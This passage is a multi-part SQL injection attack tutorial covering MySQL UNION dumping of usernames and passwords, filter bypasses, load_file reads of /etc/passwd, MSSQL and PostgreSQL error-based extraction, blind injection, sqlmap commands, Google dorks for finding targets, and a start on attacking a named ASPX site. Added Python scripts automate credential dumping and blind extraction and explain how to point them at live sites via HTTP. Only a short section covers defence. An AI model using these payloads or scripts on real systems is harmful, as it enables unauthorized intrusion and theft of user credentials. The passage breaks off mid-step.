If the database version is 4 you will not be able to list table and column names; you have to guess
them. If the version is 5 or later, skip this step.
Names of some possible tables:
Code:

admin
admins
user
users
member
members

Names of some possible columns:
Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd

If the database version is 5 we can read table names as follows: instead of the number 2 we put
group_concat(table_name), and after the last column number we add
+from+information_schema.tables+where+table_schema=database()--
(group_concat joins all rows into one comma-separated string, so the whole list fits in the single
row the page displays; table_schema=database() limits it to the current database.)

So we get this link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--

Instead of the number 2 the page now shows the table names, in this case date, book, users. We are going
to take the columns from the users table.

8) Finding column name

We found the table we want, now we want its columns. Instead of group_concat(table_name) we put
group_concat(column_name), and instead of
+from+information_schema.tables+where+table_schema=database()-- we put
+from+information_schema.columns+where+table_name=hex--, where hex is the table name encoded as a
hexadecimal literal. (A 0x... literal is a string to MySQL but contains no quote characters, so it
still works when the application escapes or strips quotes.)

Go to:
Code:
http://www.string-functions.com/string-hex.aspx

write the name of the table (in this case users) and we get the hex string 7573657273, so now we
can see the columns:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--

9) Taking data from columns

We got: id, name, surname, username, password, level.
We need only username and password.

Instead of group_concat(column_name) we put group_concat(username,0x3a,password). 0x3a is the
colon character ':', used as a separator between the username and the password. Instead of
+from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--

and we have the link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--

and a result like:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga

which are the usernames and passwords from this site. (group_concat is limited by the server's
group_concat_max_len, 1024 bytes by default, so on a large table the list is silently truncated.)

10) Filter bypassing

If the request with union+select+all is refused ("not accessible" or similar), the filter is probably a
case-sensitive keyword match; change the case to UnIoN+sElEcT+aLl.
On some sites the space character is blocked, so use + (the URL encoding of a space) or /**/ (an inline
SQL comment, which MySQL treats as whitespace).
On some sites version() is blocked or its result does not render; unhex(hex(version())) returns the same
string and often gets through.

11) Site protection from SQL Injection

Just put this code in your script, before the id is used in a query:
Code:
<?php
// Reject anything that is not a number, e.g. an appended ' or +and+1=2
if (!is_numeric($_GET['id'])) {
    die('Invalid id');
}
?>

This blocks the payloads above, but note that is_numeric() also accepts values such as "1e3" and " 1"
(leading whitespace). The robust fix is to cast to (int) and, above all, to use prepared statements with
bound parameters, so the id can never be interpreted as SQL.
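
As an added, runnable example (not code from the original tutorial): the vulnerable lookup from step 11
beside its fixed version, with steps 4, 7 and 9 automated against it. It uses Python's bundled sqlite3 as a
stand-in for MySQL so it runs offline; the books/users schema and rows are constructed for the demo,
sqlite_master replaces information_schema, and char(58) replaces 0x3a. The ORDER BY probing is done as a
binary search, which generalises the tutorial's 5, 10, 7, 8 guess sequence.

```python
import sqlite3

# Constructed stand-in for the tutorial's book.php?id= target: books has
# 7 columns like the tutorial's example, users holds the credentials we pull
# out through the UNION.  All rows are made up for the demo.
SCHEMA = """
CREATE TABLE books(id INTEGER, title TEXT, author TEXT, year INTEGER,
                   isbn TEXT, pages INTEGER, price REAL);
INSERT INTO books VALUES(141, 'Example Book', 'A. Author', 2001, '0-00', 200, 9.5);
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES(1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
"""

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def lookup_book_vulnerable(conn, book_id: str):
    """book.php as the tutorial describes it: the id is pasted straight into
    the query.  Returns rows, or None when the query errors, which is the
    'part of the page disappears' signal the tutorial relies on."""
    sql = "SELECT id,title,author,year,isbn,pages,price FROM books WHERE id=" + book_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None

def lookup_book_safe(conn, book_id: str):
    """The fix: validate the type, then bind the value.  The id is sent as
    data, so it can never become part of the SQL."""
    if not book_id.isdigit():
        raise ValueError("id must be a plain integer")
    return conn.execute(
        "SELECT id,title,author,year,isbn,pages,price FROM books WHERE id=?",
        (int(book_id),)).fetchall()

def count_columns(oracle, max_cols: int = 64) -> int:
    """Tutorial step 4 (ORDER BY n) as a binary search.
    oracle(suffix) -> True when the page renders normally.
    Invariant: ORDER BY lo works, ORDER BY hi does not."""
    assert oracle(" ORDER BY 1-- "), "ORDER BY 1 must work for the search to start"
    lo, hi = 1, max_cols + 1
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(f" ORDER BY {mid}-- "):
            lo = mid
        else:
            hi = mid
    return lo

def dump_tables(conn, ncols: int) -> set:
    """Tutorial step 7.  MySQL's information_schema.tables is sqlite_master
    here; group_concat exists in both.  The negative id empties the real
    result so the UNION row is what the page displays."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[1] = "group_concat(name)"          # the 2nd column is the visible one
    payload = (f"-141 UNION SELECT ALL {','.join(cols)} FROM sqlite_master "
               f"WHERE type='table'-- ")
    rows = lookup_book_vulnerable(conn, payload)
    return set(rows[0][1].split(","))

def dump_credentials(conn, ncols: int) -> list:
    """Tutorial step 9.  char(58) is ':' (the tutorial's 0x3a); sqlite
    concatenates with || where MySQL uses concat()."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[1] = "group_concat(username||char(58)||password)"
    payload = f"-141 UNION SELECT ALL {','.join(cols)} FROM users-- "
    rows = lookup_book_vulnerable(conn, payload)
    return rows[0][1].split(",")

def run_attack():
    """Steps 4, 7 and 9 end to end against the vulnerable lookup."""
    conn = make_db()
    oracle = lambda suffix: lookup_book_vulnerable(conn, "141" + suffix) is not None
    ncols = count_columns(oracle)
    return ncols, dump_tables(conn, ncols), dump_credentials(conn, ncols)

if __name__ == "__main__":
    print(run_attack())
```

Pointing the same three attack functions at a real target means replacing lookup_book_vulnerable with an
HTTP fetch plus a check on the response body; the payload strings stay the same apart from the
MySQL/SQLite spelling differences noted in the comments. lookup_book_safe rejects every payload above
before a query is built, and the bound parameter would neutralise them even if the check were missing.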

SQL Injection - Load File :

You found a site with an SQL injection vulnerability; now you can try to access the mysql.user table and
check for the FILE privilege.

To see which accounts exist and whether we can read mysql.user at all, we put user instead of a
vulnerable column and add +from+mysql.user-- at the end of the URL.

It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--

If you get a username, it means you can read the mysql.user table and you can continue with
this tutorial. (Ordinary application accounts cannot read mysql.user, so this already tells you the
connection runs with very high privileges.)

Now, to see whether we have the FILE privilege, instead of user we put concat(user,0x3a,file_priv),
again with +from+mysql.user--

The page now lists usernames and their file privilege. Find the account the application connects
as (the one shown when you injected user, or compare with current_user()); if Y (Yes) is shown next to
it, you have the FILE privilege.

Load File:

All we have to do is put load_file('FILE NAME') in the vulnerable column.
We will try /etc/passwd, so we put load_file('/etc/passwd') in the vulnerable column.

Which looks like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--

If this gives an error (typically because the quotes are escaped), we can pass the file name as a
hex or char() literal instead; when we do that, the quotes around the file name must be removed.

Hex e.g.
When the file name is converted to hex, we prefix it with 0x:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+mysql.user--

The hex string 2f6574632f706173737764 stands for /etc/passwd.

Recommended hex converter:
Code:
www.string-functions.com/string-hex.aspx

If you decide to use char() instead, write load_file(char(file name as decimal codes))

Which looks like:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4--

where 47,101,116,99,47,112,97,115,115,119,100 stands for /etc/passwd.

Char converter:
Code:
http://pookey.co.uk/binary.php

Note that load_file() returns NULL rather than an error when the server process cannot read the file,
when the file is larger than max_allowed_packet, or when secure_file_priv restricts the directories the
server may read from; a blank column is therefore not proof that the file does not exist.

MSSQL Injection :


1) Finding number of columns

I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234

To find the number of columns we use ORDER BY. We add +order+by+5-- to the end of the
link.
Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--

and get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5
is out of range of the number of items in the select list.

/sr/page/member.asp, line 38

which means there are fewer than 5 columns. Let's try 4: we get the same error. With 3 we get a
different error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'order'.

/sr/page/member.asp, line 44

The "out of range" error is gone (the remaining error comes from a different statement, on line 44
rather than line 38, that also receives our input), which means the query on line 38 has 3 columns.


2) Finding database version

To find the database version we use @@version:
Code:
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008
19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on
Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/sr/page/member.asp, line 38

and the error message itself gives us the database version: the second column is an integer, so SQL
Server fails to convert our string into it and echoes the string in the error. Everything below relies
on this conversion error to leak one value per request.

3) Finding table name

With this conversion-error technique we get only one value per request, so tables are read one by one.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables--

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Country' to a column of data type int.

/sr/page/member.asp, line 38

so there is a table called 'Country'.

Now we have to find the other tables. We exclude the names we already know with NOT IN, so the error
shows the next one:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables+where+table_name+not+in('Country')--

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Admin' to a column of data type int.

/sr/page/member.asp, line 38

so there is an Admin table. Keep adding each new name to the NOT IN list until the error stops coming.

4) Finding column name

It is the same for columns: one per request, filtered with where+table_name='Admin'--. So we have the
link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'--

and we get the error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'USERNAME' to a column of data type int.

/sr/page/member.asp, line 38

So we have the column USERNAME. For the rest of the columns we again use NOT IN:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'PASSWD' to a column of data type int.

/sr/page/member.asp, line 38

So the second column is PASSWD.

5) Taking data from columns

Now we put the column name in place of table_name and the table name after from:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--

We get the username OjuZwqAul.

It is the same for the password:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--

We get the password M7sWt2!2uq.

Blind SQL Injection :


1) Blind SQL Injection?

The difference between SQL injection and blind SQL injection is that with blind injection the page does
not print any errors, table or column names, or column contents; that is why it is called blind. All you
have to work with is whether part of the page (an image, some text, etc.) disappears, i.e. whether the
condition you injected was true or false. In blind injection we do not use -- or /* */ comment
terminators; the condition is simply appended with AND.

2) Site vulnerability check

We have the link:
Code:
http://www.site.com/index.php?id=1

We add and 1=2:
Code:
http://www.site.com/index.php?id=1+and+1=2

If any part of the page disappears (and comes back with and 1=1), the site is vulnerable.

3) Finding database version

As said, nothing is printed in this method, so instead we ask a yes/no question: "is the version 4?".
If part of the page disappears the version is not 4; if the page stays as it should, it is 4. We use
@@version:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4

If the page loads as it should the version is 4; if not, we try:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5

4) MYSQL user

First we check whether we are able to use SELECT, because subqueries are sometimes blocked:
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1

If the page loads normally we can use SELECT; if not, we cannot. Now we check whether we can
read mysql.user:
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+mysql.user+limit+0,1)=1

As with everything else, if the page loads normally we have access to mysql.user, if not we
don't. Access to mysql.user is useful for getting the password hashes or for using load_file() and
INTO OUTFILE. (The subquery must return a single column; select * from mysql.user would fail with
"Operand should contain 1 column(s)" and read as a false result.)

5) Finding table name

To find table names all we can do is guess. First we find the table name, then the column names in
that table.
We take the link and try different table names; if the page loads normally the table exists (the
subquery succeeds and returns 1; a missing table raises an error, which the page swallows and treats as
false). ime_tabele below stands for the table name you are guessing:
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1

Our main objective is the admin table, so we try names such as:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin

6) Finding column name

Now that we have the table name it is time to find the column names. We do the same as for the
table: if the page loads normally the column exists. We need login data, so the columns are commonly:
Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass

The link we use for columns (ime_kolone stands for the guessed column name, ime_tabele for the table):
Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)+from+ime_tabele+limit+0,1)=1

7) Taking data from columns

In the whole of blind SQL injection this is the most tedious and longest part. Here we need an ASCII
table.
Code:
http://www.asciitable.com/

We only use the DEC and CHR columns of the table. First we get the username, letter by letter: we
compare the ASCII code of one character with a DEC value, e.g. 65 for A.
We have the link (column_name is the column we are reading, table_name the table, and the number
after > is the DEC value we compare against):
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+limit+0,1),1,1))>DEC

If the page loads normally the character's code is greater than DEC; if not, it is less than or
equal. Narrow the value down (try 64, then 96, then 80, and so on: each answer halves the range, so
about 7 requests settle one character) and confirm it with = instead of >. To get the second letter
change substring(...,1,1) to substring(...,2,1). limit+0,1 selects the row, so for the second user
change +limit+0,1 to +limit+1,1.
It is the same for the password. So after a long time we get the username and password. If there
are more users and you want their passwords too, you add a WHERE clause.
So it should look like:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+where+column_name=something+limit+0,1),1,1))>DEC

For the WHERE on a second column we usually use id, but other columns work too. E.g. for id:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+where+id=1+limit+0,1),1,1))>DEC
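
Added example, not part of the original tutorial: the character-by-character extraction of step 7
automated with a binary search. The target is a constructed sqlite3 database standing in for
index.php?id=1 (the news and users tables and their rows are made up for the demo), and the oracle is
the only thing the attacker sees: did the page render or not. SQLite names the functions unicode() and
substr() where MySQL has ascii() and substring(); everything else follows the tutorial's condition.

```python
import sqlite3

# Constructed stand-in for index.php?id=1: a news table the page renders
# from, and a users table we want to read blind.  Nothing from users is
# ever printed; the page only shows or hides the news body.
SCHEMA = """
CREATE TABLE news(id INTEGER, body TEXT);
INSERT INTO news VALUES(1, 'Posted 3-3-2008');
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES(1, 'admin', 's3cret!'), (2, 'coach', 'pw2');
"""

def make_target() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def page_renders(conn, injected_id: str) -> bool:
    """The blind oracle: True when the news body would be shown.  Errors
    are swallowed, so a broken query looks exactly like a false condition."""
    try:
        row = conn.execute("SELECT body FROM news WHERE id=" + injected_id).fetchone()
        return row is not None
    except sqlite3.Error:
        return False

def make_oracle(conn):
    """oracle(condition) -> bool, i.e. the tutorial's id=1+and+<condition>."""
    return lambda condition: page_renders(conn, "1 AND " + condition)

def extract_string(oracle, subquery: str, max_len: int = 64, max_code: int = 127):
    """Reads the single value returned by subquery one character at a time.
    Per character a binary search over the code range asks only
    'is the code greater than mid?', so 7 requests settle an ASCII character.
    Returns (value, number_of_requests).

    max_code=127 mirrors the tutorial's ASCII table; raise it for data that
    may contain non-ASCII characters."""
    value, requests = [], 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, max_code
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if oracle(f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end yields '', unicode('') is NULL and every
            # comparison is false: the string is finished.
            break
        value.append(chr(lo))
    return "".join(value), requests

def dump_user(conn, user_id: int):
    """Username and password for one row, selected with WHERE id as the
    tutorial does for the second and later users."""
    oracle = make_oracle(conn)
    user, r1 = extract_string(oracle, f"SELECT username FROM users WHERE id={user_id} LIMIT 0,1")
    pw, r2 = extract_string(oracle, f"SELECT password FROM users WHERE id={user_id} LIMIT 0,1")
    return user, pw, r1 + r2

if __name__ == "__main__":
    conn = make_target()
    oracle = make_oracle(conn)
    print("vulnerable:", oracle("1=1") and not oracle("1=2"))       # steps 2
    print("users table exists:", oracle("(select 1 from users limit 0,1)=1"))  # step 5
    print(dump_user(conn, 1))
```

The request count returned by dump_user is what makes the tutorial's "long long time" concrete: with
a 7-bit range it is 7 requests per character plus 7 to detect the end of the string, against the
roughly 128 per character of linear guessing. Against a live site, page_renders becomes an HTTP fetch
that looks for the --string text sqlmap is given in step 8.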

8) Taking data from columns using sqlmap

As you have noticed, getting data out of columns by hand takes a lot of time, so I suggest using sqlmap.
Download:
Code:
http://sqlmap.org/

Python download:
Code:
http://www.python.org/download/

Now we have to find the directory where sqlmap is located.
Start > Run > cmd and change to the sqlmap directory with cd.
The command to start sqlmap for blind SQL injection data extraction on Windows is:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

NOTE: on unix put python before sqlmap.py
So it should look like:
Code:
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

If there are more users, as I said, use id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"

After -u you put the link.
After -p you put the vulnerable parameter (in our case id).
-a picks a random User-Agent from txt/user-agents.txt
-v1 is the verbosity level
After --string we put a piece of text that sqlmap uses to recognise a true response (the part of the
page that disappears when the condition is false).
-e is the SQL statement we want to execute. In our case this one:
Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1

(These short options are from the sqlmap version the tutorial was written against; in current sqlmap
the same things are --random-agent and --sql-query, while -u, -p, -v and --string are unchanged.)

Postgre SQL Injection :


1) Postgre SQL Injection?

PostgreSQL injection is almost the same as the MySQL injection above; the difference is that the backend
is PostgreSQL rather than MySQL. The attack is a bit more involved than the usual SQL injection, because
PostgreSQL is stricter about types and uses some different functions, as you will see.

2) Finding vulnerable sites

Finding vulnerable sites is the same as for the usual SQL injection, which means we can use Google
dorks.
Here is some:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

You found a site that may be vulnerable. To check, we add ' to the end of the link.
Code:
http://www.link.com/page.php?page=1'

So if on the page we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

or some part of the page disappears, the site is vulnerable.

4) Finding number of columns

So we know the site is vulnerable; now we need the number of columns. This time we do it with
UNION SELECT NULL, adding one null per column until the query stops failing.
Our link:
Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-

If the page loads normally the column count matches. If part of it disappears (a UNION with the wrong
number of columns is an error: "each UNION query must have the same number of columns"), there are
more columns, so we add another null:
Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null--+-

We keep adding nulls until the page loads. If 5 nulls fail and 6 nulls load, there are 6 columns.
(PostgreSQL has no dual table, so do not append from dual as you might in Oracle or MySQL; it only adds
an error of its own.)

5) Finding vuln
erable columns

Finding a usable column is easy. NULL is accepted in a column of any type, which is why the count was
found with nulls; now we replace one null at a time with a real value. PostgreSQL requires the UNION
columns to have compatible types, so a text value placed in an integer column produces an error ("UNION
types integer and text cannot be matched"), while a column that accepts it and is rendered shows the
value on the page.
So:
Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-

If nothing is listed (or the page breaks), that column is not usable: set it back to null and move on
to the next one.

6) Finding database version

We do this with the version() function.
The link shows us the version:
Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-

and we get something like:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit

7) Finding table name

Same as the usual SQL injection; the only difference is that the other columns are null rather than
numbers.
So it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all+table_name,null,null,null+from+information_schema.tables--+-

This returns one row per table; the page typically renders only the first, so add +limit+1+offset+N to
step through them (or filter with +where+table_schema='public' to skip the system catalogs).

8) Finding column name

Also easy, no big difference. Note that the table name is a string and must be quoted:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name='users'--+-

Sometimes this will not work because the quotes are escaped, so we build the string from character
codes with CHR() and || (string concatenation) instead, which needs no quotes. Get the decimal codes
here:
Code:
http://easycalculation.com/ascii-hex.php

For users the codes are 117 115 101 114 115, so we have the link:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name=CHR(117)||CHR(115)||CHR(101)||CHR(114)||CHR(115)--+-

9) Taking data from columns

Also almost the same as the usual SQL injection; CHR(58) is the colon separator, and the remaining
columns stay null so the count still matches:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password,null,null,null+from+users--+-

Error based Postgre SQL Injection :


1) Error based Postgre SQL Injection?

Error-based PostgreSQL injection is a web attack against a PostgreSQL backend in which no UNION is
needed: you can still get all tables, columns and column values, but, as the name says, the results are
returned inside error messages, one value per request.

2) Finding vulnerable sites

Use Google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

Add ' at end of link:
Code:
http://www.link.com/page.php?page=1'

so if we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near

site is vulnerable.

4) Finding database version

Use the version() function. In this type of attack the query looks a bit more complicated than in the
usual SQL injection, so don't get confused: we cast the string to an integer, which fails, and
PostgreSQL quotes the offending value in the error.
Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--

If the injection works you get this on the page:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC
gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

from which we read the database version:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit

5) Finding table name

As said at the start, we cannot get all tables at once, so we use LIMIT and OFFSET.

OFFSET says which result row we want listed (0 is the first).
Our link:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+0)+as+int)--

On the page we get this error:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "pg_type"

so we have a table pg_type. (Without an ORDER BY the row order is not guaranteed, but in practice it is
stable between requests; the pg_* names are PostgreSQL's own catalog tables, so keep stepping until the
application's tables appear.)

To get the next table we change the offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+1)+as+int)--

and get a table such as pg_attribute.

6) Finding column name

First we convert the table name into decimal character codes.
We use:
Code:
http://easycalculation.com/ascii-hex.php

Type the string admin and you get the decimal codes:
Code:
97 100 109 105 110

We rewrite this as CHR() calls joined with || (the + signs are URL-encoded spaces):
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)

Now we use it as the table name and get the columns:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+where+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+offset+0)+as+int)--

and we get the column id. We keep increasing the offset until the site sends us back to the home page
(the subquery returns no row, so the cast has nothing to fail on and the condition is simply false),
which means there are no more columns in that table.

7) Taking data from columns

We found the columns username and password and now we want the data from them:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username||CHR(58)||password+from+admin+limit+1+offset+0)+as+int)--

and we get:
Code:
admin:21232f297a57a5a743894a0e4a801fc3

CHR(58) is the colon character ':' and lets us pull two columns in a single request. (The value shown
is an unsalted MD5 hash, 21232f297a57a5a743894a0e4a801fc3 being md5("admin"), so it is recovered from
any lookup table.)
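
Added example, not from the original tutorial, covering both the MSSQL NOT IN loop (MSSQL section,
steps 3 and 4) and the PostgreSQL LIMIT/OFFSET loop (steps 5 and 6 above); the ASPX section that follows
uses the same SQL Server conversion error, so the same parser applies there. fake_mssql and fake_pg are
constructed stand-ins that answer the tutorial's payloads with the error texts quoted on this page, and
FIXTURE_TABLES is made up. The enumerate_* functions are the attacker side and accept any
fetch(url) -> str callable, so a real HTTP client drops in for the fakes.

```python
import re

# Constructed fixture: the table names a target would hold, in the order the
# database happens to return them.  Swap fake_mssql / fake_pg for a real
# fetch (e.g. requests.get(url).text) to run against a live target.
FIXTURE_TABLES = ["Country", "Admin", "Orders"]

MSSQL_ERROR = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
               "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
               "the nvarchar value '{}' to a column of data type int.\n"
               "/sr/page/member.asp, line 38")
PG_ERROR = ("Warning: pg_query() [function.pg-query]: Query failed: ERROR: "
            "invalid input syntax for integer: \"{}\"")
NORMAL_PAGE = "<html><body>Welcome</body></html>"

def fake_mssql(url: str) -> str:
    """Simulates member.asp?id=234 under the tutorial's NOT IN payload: the
    first table not yet excluded is echoed in a conversion error."""
    excluded = re.findall(r"'([^']*)'", url) if "+not+in(" in url else []
    left = [t for t in FIXTURE_TABLES if t not in excluded]
    return MSSQL_ERROR.format(left[0]) if left else NORMAL_PAGE

def fake_pg(url: str) -> str:
    """Simulates page.php?page=1 under the tutorial's LIMIT 1 OFFSET n payload."""
    m = re.search(r"offset\+(\d+)", url)
    n = int(m.group(1)) if m else 0
    return PG_ERROR.format(FIXTURE_TABLES[n]) if n < len(FIXTURE_TABLES) else NORMAL_PAGE

# Attacker side: one regex per backend pulls the leaked value out of the error.
MSSQL_LEAK = re.compile(r"nvarchar value '([^']*)' to a column of data type int")
PG_LEAK = re.compile(r'invalid input syntax for integer: "([^"]*)"')

def enumerate_mssql_tables(fetch, base_url: str, max_rows: int = 200) -> list:
    """MSSQL section step 3, looped: every name seen so far goes into the
    NOT IN list, so the next request leaks the next name.  Stops when the
    page comes back without the conversion error."""
    found = []
    for _ in range(max_rows):
        exclude = ""
        if found:
            quoted = ",".join("'" + t + "'" for t in found)  # a name containing ' would need escaping
            exclude = "+where+table_name+not+in(" + quoted + ")"
        url = (base_url + "+union+select+all+1,table_name,3"
               "+from+information_schema.tables" + exclude + "--")
        m = MSSQL_LEAK.search(fetch(url))
        if not m:
            break
        found.append(m.group(1))
    return found

def enumerate_pg_tables(fetch, base_url: str, max_rows: int = 200) -> list:
    """Error-based PostgreSQL section step 5, looped: the offset is simply
    incremented, so every request costs the same however many names are
    already known (the NOT IN list above grows with each result)."""
    found = []
    for offset in range(max_rows):
        url = (base_url + "+and+1=cast((select+table_name+from+information_schema.tables"
               "+limit+1+offset+" + str(offset) + ")+as+int)--")
        m = PG_LEAK.search(fetch(url))
        if not m:
            break
        found.append(m.group(1))
    return found

if __name__ == "__main__":
    print(enumerate_mssql_tables(fake_mssql, "http://www.site.com/sr/page/member.asp?id=234"))
    print(enumerate_pg_tables(fake_pg, "http://www.link.com/page.php?page=1"))
```

Column enumeration is the same loop with column_name and a where+table_name=... clause added to the
URL, and for the ASPX page the MSSQL_LEAK pattern is adjusted to the exact conversion-error text that
target returns.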

NOTE: (regarding the rest of the tutorial) from here on I am not going to explain things in detail,
because I think you should be able to figure it out by now. So I am going to use pictures and code only.

SQL Injection on ASPX :


1) Site vulnerability check

Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton

We add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--

If you get a page error, drop the second parameter and continue with:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535

2) Finding column name

Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1

(HAVING without GROUP BY makes SQL Server complain that the first selected column "is invalid in the
select list because it is not contained in either an aggregate function or the GROUP BY clause", and
the error names that column.)

3) Finding table name
Code:
